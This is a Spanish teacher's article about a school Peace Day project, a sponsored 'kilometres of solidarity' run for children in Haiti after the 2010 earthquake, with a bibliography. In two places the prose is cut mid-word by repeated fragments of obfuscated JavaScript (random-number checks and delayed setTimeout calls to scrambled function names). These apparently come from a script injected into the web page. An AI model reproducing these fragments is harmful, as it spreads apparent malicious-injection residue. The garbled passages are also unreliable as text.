KILÓMETROS DE SOLIDARIDAD CON LOS NIÑOS DE HAITÍ

Autora: María de la Soledad Salido Sánchez

           Como sabemos, el día 28 de enero celebramos el Dia Escolar de la Paz y No Violencia. Tras algunos años programandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando actividades para este dia como sembrar la paz, dibujar palomas, pintarnos las manos de blanco para simbolizar la paz, elegir lemas que se identificasen con este valor, etc. Este año, en nuestro centro educativo, decidimos trabajar también la solidaridad. El proyecto se llamaba “Kilómetros de solidaridad con los niños de Haití”, una propuesta realizada por una organización independiente que trabaja a favor de la infancia “Save the children”.                                                                                  

            Aunque en un principio decidimos que este proyecto estaba más relacionado con el Dia Escolar de los Derechos de la Infancia (celebrado en el mes de noviembre) nos pareció que esta idea tan brillante no debíamos dejarla pasar de lado, puesto que lo realmente importante eran los valores que aquí se trabajarían; pues como se nos manifiesta en la actual legislación educativa: la educación en valores es esencial dentro del proceso de Enseñanza – Aprendizaje. Así, en el artículo 7 de nuestro Decreto de Currículo se establece que “sin perjuicio de su tratamiento específico en alguna de las áreas de la etapa, la comprensión lectora, la expresión oral y escrita, la comunicación audiovisual y la educación en valores se trabajaran en todas las áreas”.               

           Por fin, nos pusimos “manos a la obra”. En primer lugar, la Organización nos proporcionó, como orientación, una guía didáctica que incluía información detallada acerca del proyecto que íbamos a trabajar, un dossier informativo sobre Haití, algunos testimonios de personas que habían vivido esta gran tragedia…

          Como actividades previas se estableció una sesión dedicada a informar a nuestros discentes sobre la problemática que se vive actualmente en Haití, poniéndoles en precedentes el origen: el terremoto que desoló este país el 12 de enero de 2010, hace algo más de un año. Después, a través de Internet procedieron a situar Haití en el mapa, además de visualizar un DVD explicativo sobre dicha actividad.        

          Entre las actividades de desarrollo se estableció la carrera solidaria por Haití, que se desarrolló en los alrededor del colegio, en una amplia zona verde donde los niños podían correr libremente. Cada uno tenía su dorsal correspondiente. Los alumnos debían buscar amigos y familiares que les patrocinasen y que se comprometieran a aportar algo de dinero por cada kilómetro recorrido. Siempre transmitimos la idea de que la cantidad de dinero era simbólica, pues lo realmente importante era familiarizarse con la situación de Haití y comprometerse con ellos. Una vez recogido el dinero, el especialista de Educación Física ingresó el dinero recaudado en la cuenta de la Organización.                   

           La actividad final la titulamos “Y tú, ¿qué quieres ser de mayor?”, con el principal objetivo de tomar conciencia de la colaboración, la implicación y el trabajo conjunto como base de mejora de la realidad mundial. Esta actividad consistía en leer un manifiesto de una niña de Haití que lo perdió todo en el terremoto y donde expone sus manifiestos acerca de lo que quería ser de mayor. Cada uno debía de pensar en una profesión que le gustaría desempeñar, manifestandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando cómo a través de la misma podría ayudar a todos los niños de Haití. Para finalizar, recibieron un diploma solidario que reconocía el esfuerzo por los kilómetros recorridos y por dar a conocer la situación de los niños y niñas haitianos.


 


 

           Sin duda, creo que fue una actividad que recordaran durante mucho tiempo.

           Como bien dice José Antonio Marina, filósofo y escritor comprometido con la educación en valores y la convivencia escolar, “Es hora de cambiar la cultura de la queja, por la cultura de la acción”.


BIBLIOGRAFÍA Y WEBGRAFÍA:                                                                                        

  •  LEY ORGÁNICA, 2/2006, de 3 de Mayo, de Educación, BOE, número 106 de 4/5/2006, páginas 17158 a 17207.
  • DECRETO 82/2007, de 24 de abril, por el que se establece el Currículo de Educación Primaria para la Comunidad Autónoma de Extremadura, DOE, 3 de mayo de 2007, núm.50, p.7825-7929.                                                     
  • PIAGET, J. (2.001): La representación del mundo en el niño. Madrid: Morata.
  • http://www.savethechildren.es                                                                  
  • http://www.educarex.es                                                            
  •  http://www.mec.es/educa                                                
  • http://www.portales.educared.net/convivenciaescolar/    
  • http://www.educacionenvalores.org

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.